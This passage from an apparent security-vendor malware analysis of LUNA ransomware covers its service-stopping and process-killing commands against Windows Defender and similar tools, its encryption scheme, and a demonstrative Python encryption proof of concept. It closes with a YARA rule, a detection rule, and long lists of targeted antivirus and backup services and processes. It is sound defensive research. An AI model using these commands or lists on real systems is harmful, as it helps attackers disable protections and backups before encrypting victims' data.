In this case, it is used to stop the running services that have already been prevented from restarting by **sc.exe**.\n\n\n\n- **\"C:\\WINDOWS\\system32\\net.exe\" stop [service] /y**\n - **\"C:\\WINDOWS\\system32\\net.exe\"** : Net executable\n - **stop [service]**: Specifies the name of the service (as an example, WinDefend) that will be stopped\n - **/y** : Carries out the command without first prompting to confirm actions\n\nAgain there are no checks that the service is actually running on the victim machine. For Net, this manifests as **2185** errors printing to the console for each attempt to stop a nonexistent service.\n\n\n\n#### TaskKill\n\n[TaskKill](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill) ( **taskkill.exe** ) is a Windows utility used to end a task or process by the process ID or image name. LUNA uses TaskKill to terminate processes by name that could interfere with the malware’s operation by maintaining file access locks on files targeted for encryption.\n\n\n\n- **\"C:\\WINDOWS\\system32\\taskkill.exe\" /im [process name] /f**\n - **\"C:\\WINDOWS\\system32\\taskkill.exe\"** : TaskKill executable\n - **/im [process name]**: Specifies the name of the process (as an example, msmpeng.exe) that will be terminated\n - **/f** : Specifies that processes be forcefully ended\n\nOnce again, there are no checks that the process is actually running. TaskKill produces “process not found” errors printed to the console for attempts to kill non-existent processes.\n\n\n\nOur sample contained a hardcoded list of 997 processes to kill. See the Appendix: Windows Process Termination List for the complete list.\n\n#### Disk enumeration\n\nNext, Windows LUNA executed with no arguments uses a function called **get_all_drives** to brute-force the enumeration of all the available drives by going through the English alphabet and verifying if the drives are mapped to the machine using Rust library **std::fs::read_dir**. 
If the volume exists, it will be flagged for encryption at a later stage.\n\n\n\nAll volumes identified are then passed to LUNA’s **walk_dir** function that will drop ransom notes, enumerate subdirectories, and encrypt files similar to the Linux version with the exact same ransom note.\n\n\n\n#### Windows exclusions\n\nUnlike the Linux version, however, the Windows LUNA file and folder exclusions are respected to prevent making the targeted machine inoperable or inadvertently stopping encryption prematurely.\n\n| File Extension Exclusions | Folder Exclusions |\n| ------------------------- | -------------------------------------------------------------------- |\n| .Luna, .ini, .exe, .dll, .lnk | OpenServer, Windows, Program Files, Recycle.Bin, ProgramData, AppData, All Users |\n\nWe compared these exclusions with those from our [CUBA Ransomware Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-directories) report. LUNA did not include the file extensions **.sys** or **.vbm**, both identified in the CUBA analysis. Also, LUNA excludes all of the **\\Program Files**, **\\ProgramData**, and **\\AppData** directories and subdirectories, which CUBA encrypts or for which it has narrower subfolder exclusions. This seems like an overly broad exclusion methodology, as it misses some valuable data that would be disruptive if encrypted.\n\n## Encryption Implementation\n\nLUNA uses a multi-step encryption implementation approach designed to make the author’s decryption tool the only known way to recover targeted files.\n\n### Encryption process\n\nThe malware author generates a public/private key pair before compilation and embeds the public key in the LUNA binary for later use by the malware. 
The author maintains the private key until the victim has met their demands.\n\n\n\n> In many cases, ransomware actors generate a new “author’s” key pair for each victim organization.\n\nWithin the **add_file** function, each time LUNA encounters a new file to encrypt, the malware will generate its own public/private key pair associated with that file. It does this by using the open source library [x25519-dalek](https://github.com/dalek-cryptography/x25519-dalek) x25519 elliptic curve Diffie-Hellman key exchange with the [**RngCore::fill_bytes**](https://docs.rs/rand/latest/rand/trait.RngCore.html#tymethod.fill_bytes) random number generator used for entropy, which is built into Rust.\n\n\n\n> Elliptic curve ([ECC](https://en.wikipedia.org/wiki/Elliptic-curve_cryptography)) key generation offers several performance improvements over RSA for equivalent key size. Generally, for a given key size, ECC offers greater cryptographic strength and is faster to derive a public key from a private key. This speed improvement helps when a new key pair is generated for every file to be encrypted on a victim machine.\n\nAt this point, there are two sets of public/private keys: the author’s and the malware’s.\n\nLUNA will then use the malware-generated private key and the author’s embedded public key to derive an AES key.\n\n\n\nFiles can then be encrypted by chunk with AES in counter (CTR) mode and an initialization vector (IV). The hardcoded IV is the string “Luna” padded with zeros to be 16 bytes long, as required by the AES-CTR cipher algorithm.\n\n\n\n> [Initialization vectors](https://en.wikipedia.org/wiki/Initialization_vector) are broadly used in cryptography to provide input to initialize the state of the cipher algorithm before the plaintext is encrypted. In most other contexts it is randomized and shared with the public key. 
This randomization provides a similar function to salt for hashed passwords.\n\nUsing the **std::io::Seek** trait, Rust is able to abstract the OS-appropriate **seek**, i.e. **lseek** for Linux. The malware uses this function to read data from the target file, encrypt it, and write it back to the original file.\n\nLUNA first overwrites the original file with the encrypted content, then appends the malware’s public key created for that file and the string “Luna” as a file marker. The extension **.Luna** is then added to the filename.\n\n\n\n\n\nAt this point, the AES and malware’s private keys are no longer needed and must be destroyed so only the author’s private key can be used for decryption.\n\nLUNA then moves to the next file and starts again.\n\n### Decryption process\n\nIn order to decrypt a file encrypted with this method, we need the AES key and the IV. The IV is hardcoded into the malware and already known; however, the AES key is discarded once the file is encrypted. The AES key was initially generated using the malware’s private key and the author’s public key, but the malware’s private key has also been discarded.\n\nWhile we also have the malware’s public key in the encrypted file itself, the author’s private key is required, in combination with the malware's public key, to derive the AES key. The AES key in combination with the hardcoded IV can then be used to decrypt each encrypted chunk.\n\n\n\nBelow you can see a graphic outlining the encryption and decryption process of the LUNA ransomware.\n\n\n\n### Chunk encryption\n\nLike many ransomware families, LUNA encrypts files differently based on size. This serves to enhance performance and allows the ransomware to make a larger volume of data unusable in a shorter period of time.\n\nIf the file is smaller than **320** kB, the entire contents of the file are encrypted using the above-described method. 
If the file size is between **320** kB and approximately **3** MB then only the first **320** kB will be encrypted. For files larger than approximately **3** MB LUNA will encrypt **320** kB chunks deriving the space between chunks by a byte value calculated at run-time based on the file size.\n\n### LUNA encryption POC\n\nIf you're interested in trying this out yourself to see the encryption/decryption process in action, check out Elastic's Malware Analysis and Reverse Engineering (MARE) team's Python POC in the LUNA Encryption POC Appendix. This script illustrates the implementation of the LUNA encryption/decryption mechanism.\n\n\n\n## Summary\n\nThe samples were nearly identical in their core functionality of the -dir and -file execution paths, the encryption mechanisms utilized, and hard-coded values. Hardcoded value similarities include:\n\n- Extension exclusion values\n- Folder exclusion values\n- Initialization vector\n- Author’s public key\n- Ransomware note\n\nThe most obvious difference between the two LUNA samples we looked at is the enhanced functionality of the Windows PE sample when provided no arguments and the adherence to the extension and folder exclusions for Windows.\n\nThere are many differences between the two OS packages; it is probably more convenient to provide a single decryption tool for all endpoints ransomed, irrespective of the OS. A uniform encryption and decryption framework could indicate that the LUNA ransomware is used in a [Ransomware-as-a-Service](https://www.trendmicro.com/vinfo/us/security/definition/ransomware-as-a-service-raas) implementation or that LUNA is provided as a kit that can be tailored to specific campaigns.\n\nThese differences and similarities lead us to the following assessments of these samples:\n\n1. 
The Windows sample is much more mature than the Linux sample, as reflected in the drive enumeration, service disable/stop, process termination, and exclusions employed to enable the malware to be deployed broadly with little detailed knowledge of the victim machines.\n2. The Linux sample contains vestigial Windows features. The exclusions could be modified to fit some specific Linux distributions, but it could be a challenge to create one list that has broad coverage in the diverse Linux ecosystem.\n3. The service disable/stop and process terminate lists are very large when compared to other mature ransomware samples. While it does not impede the encryption function of the malware, it generates a tremendous amount of noise that could alert defenders. Calling **sc config [service] start=disabled** and **net stop** 253 times for many services that do not exist, or **taskkill /im** 997 times for processes that do not exist, provides an excellent opportunity to interdict ransomware execution before encryption begins. This would be much quieter with prior service and process enumeration, as is common with other ransomware campaigns.\n4. The Linux sample did not include the safeguards built into the Windows variant. This caused the Linux sample to encrypt files needed to validate entitlements to system files, such as the **sudoers** and **passwd** files. Possible reasons why the Linux sample did not include safeguards:\n\n 1. the malware authors did not have a firm enough understanding of Linux system files and directories to know what should be excluded;\n 2. a time constraint prevented the completion of a mature Linux sample;\n 3. a lack of widely available ransomware exclusion lists for Linux;\n 4. inclusion of a Linux sample was opportunistic because the sample was developed in Rust, which is cross-platform; or\n 5. 
Linux capabilities were included as a “selling point” for a Ransomware-as-a-Service offering\n\n## Observed Adversary Tactics and Techniques\n\n### Tactics\n\nUsing the MITRE ATT&CK® framework, tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- [Impact](https://attack.mitre.org/tactics/TA0040)\n\n### Techniques / sub-techniques\n\nTechniques and sub-techniques represent how an adversary achieves a tactical goal by performing an action.\n\nObserved techniques/sub-techniques:\n\n- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)\n- [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)\n- [System Service Discovery](https://attack.mitre.org/techniques/T1007/)\n- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)\n\n## Detections\n\nOur detection/protection philosophy regarding ransomware focuses on pre-encryption detection, when defenders still have an opportunity to interdict malware execution before data is lost.\n\n### YARA\n\nFor LUNA Windows and Linux variants, the [YARA rule below](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Ransomware_Luna.yar) detects strings embedded in the malware and byte sequences related to core functionality.\n\n```\nrule Multi_Ransomware_LUNA {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-08-02\"\n os = \"Linux, Windows\"\n arch = \"x86\"\n category_type = \"Ransomware\"\n family = \"LUNA\"\n threat_name = \"Multi.Ransomware.LUNA\"\n reference_sample = \"1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51\"\n strings:\n $str_extensions = \".ini.exe.dll.lnk\"\n $str_ransomnote_bs64 = \"W1dIQVQgSEFQUEVORUQ/XQ0KDQpBbGwgeW91ciBmaWxlcyB3ZXJlIG1vdmVkIHRvIHNlY3VyZSBzdG9yYWdlLg0KTm9ib\"\n $str_path = \"/home/username/\"\n 
$str_error1 = \"Error while writing encrypted data to:\"\n $str_error2 = \"Error while writing public key to:\"\n $str_error3 = \"Error while renaming file:\"\n $chunk_calculation0 = { 48 8D ?? 00 00 48 F4 48 B9 8B 3D 10 B6 9A 5A B4 36 48 F7 E1 48 }\n $chunk_calculation1 = { 48 C1 EA 12 48 89 D0 48 C1 E0 05 48 29 D0 48 29 D0 48 3D C4 EA 00 00 }\n condition:\n 5 of ($str_*) or all of ($chunk_*)\n}\n```\n\n### Endpoint rules\n\nFor Windows LUNA there is the opportunity to prevent execution before encryption in the “no arguments” execution flow. As outlined in the previous sections, this execution flow attempts to disable and stop 253 services and terminate 997 processes whether or not they exist on the victim machine.\n\nOur Threat Research And Detection Engineering team (TRADE) tuned and promoted [a behavioral endpoint rule](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_attempt_to_disable_windows_defender_services.toml) targeting these pre-encryption environmental preparation TTPs.\n\nThe below rule identifies and prevents attempts to disable the Windows Defender services.\n\n```\nquery = '''\nprocess where event.action == \"start\" and\n process.pe.original_file_name : (\"net.exe\", \"sc.exe\", \"cmd.exe\") and\n process.command_line : (\"*disabled*\", \"*stop*\") and process.command_line : (\"*WdNisSvc*\", \"*WinDefend*\") and\n (process.parent.executable :\n (\"?:\\\\Windows\\\\Microsoft.NET\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\ProgramData\\\\*\") or\n process.parent.name : (\"rundll32.exe\", \"regsvr32.exe\", \"wscript.exe\", \"cscript.exe\", \"powershell.exe\", \"mshta.exe\"))\n'''\n\noptional_actions = []\n[[actions]]\naction = \"kill_process\"\nfield = \"process.entity_id\"\nstate = 0\n```\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://securelist.com/LUNA-black-basta-ransomware/106950/](https://securelist.com/luna-black-basta-ransomware/106950/)\n- 
[https://www.virustotal.com/gui/file/1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51](https://www.virustotal.com/gui/file/1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51/)\n- [https://www.virustotal.com/gui/file/ad8d568811e05e12cde78f76c3b7cbbde0d20aee5b4e918a3a8d515f5e242bb6](https://www.virustotal.com/gui/file/ad8d568811e05e12cde78f76c3b7cbbde0d20aee5b4e918a3a8d515f5e242bb6)\n\n## Appendix\n\n### LUNA encryption POC\n\nWe are providing an encryption POC, written in Python, that mimics and visualizes the encryption implementation of the LUNA ransomware.\n\nNote: like LUNA, each time the script is run, the encrypted output will be different because the private keys are generated each time.\n\n**Prerequisites:**\n\n- Python 3\n- **cryptography** and **termcolor** Python modules\n\n**Usage:**\n\n- Save the below script as **luna_encryption_poc.py**\n- Install the dependencies with **pip install --user cryptography termcolor**\n- Execute the script with **python luna_encryption_poc.py**\n\n```\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives.asymmetric import x25519\n\nfrom termcolor import colored\n\n# Malware author generates public key and embeds into malware, keeps private key for decryption later\nauthor_private_key = x25519.X25519PrivateKey.generate() # Unknown author's priv_key generation method\nauthor_embedded_public_key = author_private_key.public_key()\n\n# Malware generates key pair\nmalware_private_key = x25519.X25519PrivateKey.generate()\nmalware_public_key = malware_private_key.public_key()\n\n# Serialization of malware pub_key\nmalware_public_bytes = malware_public_key.public_bytes(encoding=serialization.Encoding.Raw,\n format=serialization.PublicFormat.Raw)\nprint(\"Malware Public Key: \", colored(malware_public_bytes.hex(), \"blue\"))\n\n# AES key generated by malware's private key and author's 
embedded public key\n# malware_private_key is discarded after this step and not needed for decryption\nshared_key_generated = malware_private_key.exchange(author_embedded_public_key)\nprint(\"Generated Shared Key (AES): \" + colored(shared_key_generated.hex(), \"cyan\"))\n\n# Encryption Step with AES + IV null-padded LUNA string\niv = bytearray(b'4c756e6100000000') # 'Luna....' 16 bytes sized needed for AES CTR\n\n# AES stream cipher (CTR) created using AES shared key and IV\ncipher = Cipher(algorithms.AES(shared_key_generated), modes.CTR(iv))\nencryptor = cipher.encryptor()\n\n# String to be encrypted\nplaintext = b\"You know, for search!\"\nprint(\"Plaintext: \", colored(plaintext, \"green\"))\nprint(\"Plaintext.hex(): \", colored(plaintext.hex(), \"green\"))\n\n# Encryption of string using AES stream cipher\nct = encryptor.update(plaintext) + encryptor.finalize()\n\n# Mock encrypted file with cipher text + public bytes + file marker\nfile_marker = b\"Luna\" # 0x4c756e61\nencrypted_file = ct + malware_public_bytes + file_marker\n\nfile_ciphertext = encrypted_file[:-36]\npub_key_from_encrypted_file = encrypted_file[-36:-4]\nfile_marker_from_encrypted_file = encrypted_file[-4:]\n\nprint(\"Encrypted File contents: \\n\",\n colored(file_ciphertext.hex(), \"red\"),\n colored(pub_key_from_encrypted_file.hex(), \"blue\"),\n colored(file_marker_from_encrypted_file.hex(), \"yellow\"))\nprint(\"\\t\",\n colored(\"Encrypted content\", \"red\"), \" \",\n colored(\"Embedded malware's pub_key\", \"blue\"), \" \",\n colored(\"Embedded file marker\", \"yellow\"))\n\n# Serialization\nmalware_public_key_from_file = x25519.X25519PublicKey.from_public_bytes(pub_key_from_encrypted_file)\n\n# AES key derived from author's private key and malware embedded public key\nshared_key_derived = author_private_key.exchange(malware_public_key_from_file)\nprint(\"Derived Shared Key (AES): \", colored(shared_key_derived.hex(), \"cyan\"))\n\n# Decryption using derived AES shared key and 
IV\nredo_cipher = Cipher(algorithms.AES(shared_key_derived), modes.CTR(iv))\ndecryptor = redo_cipher.decryptor()\nresult = decryptor.update(file_ciphertext) + decryptor.finalize()\nprint(\"Decrypted plaintext: \", colored(result, \"green\"))\n```\n\nThis Python script will display the malware public key, the shared AES key, the plain text as a string, the plain text as a hex value, the encrypted text, and finally decrypt the encrypted text back into the original plain text as a string.\n\n\n\n### Windows services termination list\n\n| | | |\n| -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 
-------------------- | 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Acronis VSS ProviderAcronisAgentAcrSch2SvcAdobeARMserviceAlerterARSMaswBccavbackupBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDeviceMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceBackupExecVSSProviderbcrservicebedbgBITSBlueStripeCollectorBrokerInfrastructureccEvtMgrccSetMgrCissesrvCpqRcmc3CSAdminCSAuthCSDbSyncCSLogCSMonCSRadiusCSTacacsDB2DB2-0DB2DAS00DB2GOVERNOR_DB2COPY1DB2INST2DB2LICD_DB2COPY1DB2MGMTSVC_DB2COPY1DB2REMOTECMD_DB2COPY1DCAgentEhttpSrvekrnEnterprise Client Serviceepag EPIntegrationService EPProtectedService epredline EPSecurityServiceEPSecurityService EPUpdateServiceEPUpdateService 
EraserSvc11710ERSvcEsgShKernelESHASRVEventlogFA_SchedulerGoogleChromeElevationServicegupdategupdatemHealthServiceIBMDataServerMgrIBMDSServer41IDriverTIISAdminIMAP4SvcImapiServiceklnagentLogProcessorServiceLRSDRVXmacmnsvcmasvcMBAMServiceMBEndpointAgentMcShieldMcTaskManagermfefiremfemmsmfevtpmfewcMMSMozyprobackupMsDtsServerMsDtsServer100MsDtsServer110 | MsDtsServer130MSExchangeESMSExchangeISMSExchangeMGMTMSExchangeMTAMSExchangeSAMSExchangeSRSmsftesql$PRODMSMQ MSOLAP$SQL_2008MSOLAP$SYSTEM\\_BGCMSOLAP$TPSMSOLAP$TPSAMAMSSQL$BKUPEXECMSSQL$CITRIX\\_METAFRAMEMSSQL$ECWDB2MSSQL$EPOSERVERMSSQL$ITRISMSSQL$NET2MSSQL$PRACTICEMGTMSSQL$PRACTTICEBGCMSSQL$PRODMSSQL$PROFXENGAGEMENTMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQL$SQL_2008MSSQL$SQLEXPRESSMSSQL$SYSTEM_BGCMSSQL$TPSMSSQL$TPSAMAMSSQL$VEEAMSQL2008R2MSSQL$VEEAMSQL2012MSSQLFDLauncherMSSQLFDLauncher$ITRISMSSQLFDLauncher$PROFXENGAGEMENTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTMSSQLFDLauncher$SQL\\_2008MSSQLFDLauncher$SYSTEM_BGCMSSQLFDLauncher$TPSMSSQLFDLauncher$TPSAMAMSSQLLaunchpad$ITRISMSSQLSERVERMSSQLServerADHelperMSSQLServerADHelper100MSSQLServerOLAPServicemsvsmon90MySQL57Net2ClientSvcNetDDENetMsmqActivatorNetSvcNimbusWatcherServiceNtLmSspNtmsSvcntrtscanodservOracleClientCache80osePDVFSServicePOP3SvcProLiantMonitorReportServerReportServer$SQL_2008ReportServer$SYSTEM\\_BGCReportServer$TPSReportServer$TPSAMARESvcRSCDsvcsacsvrSamSsSAVServiceSDD_ServiceSDRSVCSentinelAgentSentinelHelperServiceSentinelStaticEngineSepMasterServiceSepMasterServiceMigShMonitorSmcinstSmcServiceSMTPSvcSNAC | SnowInventoryClientSntpServiceSQL BackupsSQLAgent$BKUPEXECSQLAgent$CITRIX_METAFRAMESQLAgent$CXDBSQLAgent$ECWDB2SQLAgent$EPOSERVERSQLAgent$ITRISSQLAgent$NET2SQLAgent$PRACTTICEBGCSQLAgent$PRACTTICEMGTSQLAgent$PRODSQLAgent$PROFXENGAGEMENTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTSQLAgent$SQL_2008SQLAgent$SQLEXPRESSSQLAgent$SYSTEM_BGCSQLAgent$TPSSQLAgent$TPSAMASQLAgent$VEEAMSQL2008R2SQLAgent$VEEAMSQL2012SQLBrowserSQLsafe Backup ServiceSQLsafe 
Filter ServiceSQLSafeOLRServiceSQLSERVERAGENTSQLTELEMETRYSQLTELEMETRY$ECWDB2SQLTELEMETRY$ITRISSQLWriterSSISTELEMETRY130SstpSvcsvcGenericHostswi_filterswi_serviceswi_updateswi_update_64SymantecSymantec System RecoverysysdownSystemTelemetryserverTlntSvrTmCCSFtmlistenTmPfw tpautoconnsvcTPVCGatewayTrueKeyTrueKeySchedulerTrueKeyServiceHelperTSMUI0DetectVeeam Backup Catalog Data ServiceVeeamBackupSvcVeeamBrokerSvcVeeamCatalogSvcVeeamCloudSvcVeeamDeploymentServiceVeeamDeploySvcVeeamEnterpriseManagerSvcVeeamHvIntegrationSvcVeeamMountSvcVeeamNFSSvcVeeamRESTSvcVeeamTransportSvcVGAuthServiceVMToolsVMwareVMwareCAFCommAmqpListenerVMwareCAFManagementAgentHostvmware-converter-agentvmware-converter-servervmware-converter-workerW3SvcwbengineWdNisSvcWebClientWinDefendWinVNC4WRSVCZoolz 2 Service |\n\n### Windows process termination list\n\n| | | |\n| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------- | -------------------- | --------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| a2service.exea2start.exeaawservice.exeacaas.exeacaegmgr.exeacaif.exeacais.exeacctmgr.exeaclient.exeaclntusr.exead-aware2007.exeadministrator.exeadminserver.exeaesecurityservice.exeaexagentuihost.exeaexnsagent.exeaexnsrcvsvc.exeaexsvc.exeaexswdusr.exeaflogvw.exeafwserv.exeagntsvc.exeahnrpt.exeahnsd.exeahnsdsv.exealert.exealertsvc.exealmon.exealogserv.exealsvc.exealunotify.exealupdate.exealuschedulersvc.exeamsvc.exeamswmagtaphost.exeappsvc32.exeaps.exeapvxdwin.exeashbug.exeashchest.exeashcmd.exeashdisp.exeashenhcd.exeashlogv.exeashmaisv.exeashpopwz.exeashquick.exeashserv.exeashsimp2.exeashsimpl.exeashskpcc.exeashskpck.exeashupd.exeashwebsv.exeasupport.exeaswdisp.exeaswregsvr.exeaswserv.exeaswupdsv.exeaswwebsv.exeatrshost.exeatwsctsk.exeaupdrun.exeaus.exeauth8021x.exeautoup.exeavcenter.exeavconfig.exeavconsol.exeavengine.exeavesvc.exeavfwsvc.exeavkproxy.exeavkservice.exeavktray.exeavkwctl.exeavltmain.exeavmailc.exeavmcdlg.exeavnotify.exeavscan.exeavscc.exeavserver.exeavshadow.exeavsynmgr
.exeavtask.exeavwebgrd.exebasfipm.exebavtray.exebcreporter.exebcrservice.exebdagent.exebdc.exebdlite.exebdmcon.exebdredline.exebdss.exebdsubmit.exebhipssvc.exebka.exeblackd.exeblackice.exebluestripecollector.exeblupro.exebmrt.exebwgo0000ca.execaantispyware.execaav.execaavcmdscan.execaavguiscan.execaf.execafw.execaissdt.execalogdump.execapfaem.execapfasem.execapfsem.execapmuamagt.execappactiveprotection.execasc.execasecuritycenter.execaunst.execavrep.execavrid.execavscan.execavtray.execcap.execcapp.execcemflsv.execcenter.execcevtmgr.execcflic0.execcflic4.execclaw.execcm messaging.execcnfagent.execcprovsp.execcproxy.execcpxysvc.execcschedulersvc.execcsetmgr.execcsmagtd.execcsvchst.execcsystemreport.execctray.execcupdate.execdm.execertificateprovider.execertificationmanagerservicent.execfftplugin.execfnotsrvd.execfp.execfpconfg.execfpconfig.execfplogvw.execfpsbmit.execfpupdat.execfsmsmd.execheckup.exechrome.execis.execistray.execka.execlamscan.execlamtray.execlamwin.execlient.execlient64.execlps.execlpsla.execlpsls.execlshield.execmdagent.execmdinstall.execmgrdian.execntaosmgr.execollwrap.execomhost.execonfig_api_service.execonsole.execontrol_panel.execoreframeworkhost.execoreserviceshell.execpd.execpdclnt.execpf.execpntsrv.execramtray.execrashrep.execrdm.execrssvc.execsacontrol.execsadmin.execsauth.execsdbsync.execsfalconservice.execsinject.execsinsm32.execsinsmnt.execslog.execsmon.execsradius.execsrss_tc.execssauth.execstacacs.exectdataload.execwbunnav.execylancesvc.execylanceui.exedao_log.exedbeng50.exedbserv.exedbsnmp.exedbsrv9.exedefwatchdefwatch.exedeloeminfs.exedeteqt.agent.exediskmon.exedjsnetcn.exedlservice.exedltray.exedolphincharge.edolphincharge.exedoscan.exedpmra.exedr_serviceengine.exedrwagntd.exedrwagnui.exedrweb.exedrweb32.exedrweb32w.exedrweb386.exedrwebcgp.exedrwebcom.exedrwebdc.exedrwebmng.exedrwebscd.exedrwebupw.exedrwebwcl.exedrwebwin.exedrwinst.exedrwupgrade.exedsmcad.exedsmcsvc.exedwarkdaemon.exedwengine.exedwhwizrd.exedwnetfilter.exedwrcst.exedw
win.exeedisk.exeeeyeevnt.exeegui.exeehttpsrv.exeekrn.exeelogsvc.exeemlibupdateagentnt.exeemlproui.exeemlproxy.exeencsvc.exeendpointsecurity.exeengineserver.exeentitymain.exeepmd.exeera.exeerlsrv.exeesecagntservice.exeesecservice.exeesmagent.exeetagent.exeetconsole3.exeetcorrel.exeetloganalyzer.exeetreporter.exeetrssfeeds.exeetscheduler.exeetwcontrolpanel.exeeuqmonitor.exeeventparser.exeevtarmgr.exeevtmgr.exeevtprocessecfile.exeewidoctrl.exeexcel.exeexecstat.exefameh32.exefcappdb.exefcdblog.exefch32.exefchelper64.exefcsms.exefcssas.exefih32.exefirefox.exefirefoxconfig.exefiresvc.exefiretray.exefirewallgui.exefmon.exefnplicensingservice.exeforcefield.exefpavserver.exefprottray.exeframeworkservicframeworkservic.exeframeworkservice.exefrzstate2k.exefsaa.exefsaua.exefsav32.exefsavgui.exefscuif.exefsdfwd.exefsgk32.exefsgk32st.exefsguidll.exefsguiexe.exefshdll32.exefshoster32.exefshoster64.exefsm32.exefsma32.exefsmb32.exefsorsp.exefspc.exefspex.exefsqh.exefssm32.exefwcfg.exefwinst.exe | fws.exegcascleaner.exegcasdtserv.exegcasinstallhelper.exegcasnotice.exegcasserv.exegcasservalert.exegcasswupdater.exeGdfirewalltray.exegdfwsvc.exegdscan.exegfireporterservice.exeghost_2.exeghosttray.exegiantantispywaremain.exegiantantispywareupdater.exegooglecrashhandler.exegooglecrashhandler64.exegoogleupdate.exegziface.exegzserv.exehasplmv.exehdb.exehealthservice.exehpqwmiex.exehwapi.exeicepack.exeidsinst.exeiface.exeigateway.exeilicensesvc.exeinet_gethost.exeinfopath.exeinicio.exeinonmsrv.exeinorpc.exeinort.exeinotask.exeinoweb.exeisafe.exeisafinst.exeisntsmtp.exeisntsysmonitorispwdsvc.exeisqlplussvc.exeisscsf.exeissdaemon.exeissvc.exeisuac.exeiswmgr.exeitmrt_supportdiagnostics.exeitmrt_trace.exeitmrtsvc.exeixaptsvc.exeixavsvc.exeixfwsvc.exekabackreport.exekaccore.exekanmcmain.exekansgui.exekansvr.exekb891711.exekeysvc.exekis.exekislive.exekissvc.exeklnacserver.exeklnagent.exeklserver.exeklswd.exeklwtblfs.exekmailmon.exeknownsvr.exeknupdatemain.exekpf4gui.exekpf4ss.exekpfw32.exekpfwsvc.e
xekrbcc32s.exekswebshield.exekvdetech.exekvmonxp.kxpkvmonxp_2.kxpkvolself.exekvsrvxp.exekvsrvxp_1.exekvxp.kxpkwatch.exekwsprod.exekxeserv.exeleventmgr.exelivesrv.exelmon.exelog_qtine.exeloggetor.exeloggingserver.exeluall.exelucallbackproxy.exelucoms.exelucoms~1.exelucomserver.exelwdmserver.exemacmnsvc.exemacompatsvc.exemanagementagenthost.exemanagementagentnt.exemantispm.exemasalert.exemassrv.exemasvc.exembamservice.exembamtray.exemcagent.exemcapexe.exemcappins.exemcconsol.exemcdash.exemcdetect.exemcepoc.exemcepocfg.exemcinfo.exemcmnhdlr.exemcmscsvc.exemcnasvc.exemcods.exemcpalmcfg.exemcpromgr.exemcproxy.exemcregwiz.exemcsacore.exemcscript_inuse.exemcshell.exemcshield.exemcshld9x.exemcsvhost.exemcsysmon.exemctray.exemctskshd.exemcui32.exemcuimgr.exemcupdate.exemcupdmgr.exemcvsftsn.exemcvsrte.exemcvsshld.exemcwce.exemcwcecfg.exemfeann.exemfecanary.exemfeesp.exemfefire.exemfefw.exemfehcs.exemfemactl.exemfemms.exemfetp.exemfevtps.exemfewc.exemfewch.exemgavrtcl.exemghtml.exemgntsvc.exemonitoringhost.exemonsvcnt.exemonsysnt.exempcmdrun.exempf.exempfagent.exempfconsole.exempfservice.exempfsrv.exempftray.exemps.exempsevh.exempsvc.exemrf.exemsaccess.exemsascui.exemscifapp.exemsdtssrvr.exemsftesql.exemskagent.exemskdetct.exemsksrver.exemsksrvr.exemsmdsrv.exemsmpeng.exemspmspsv.exemspub.exemsscli.exemsseces.exemsssrv.exemusnotificationux.exemyagttry.exemydesktopqos.exemydesktopservice.exemysqld.exemysqld-nt.exemysqld-opt.exenailgpip.exenaprdmgr.exenavectrl.exenavelog.exenavesp.exenavshcom.exenavw32.exenavwnt.exencdaemon.exend2svc.exendetect.exendrvs.exendrvx.exeneotrace.exenerosvc.exenetalertclient.exenetcfg.exenetsession_win.exenetworkagent.exenexengctw32.exengserver.exenimbus.exenimcluster.exenip.exenipsvc.exenisoptui.exenisserv.exenissrv.exenisum.exenjeeves.exenlclient.exenlsvc.exenmagent.exenmain.exenortonsecurity.exenpfmntor.exenpfmsg.exenpfmsg2.e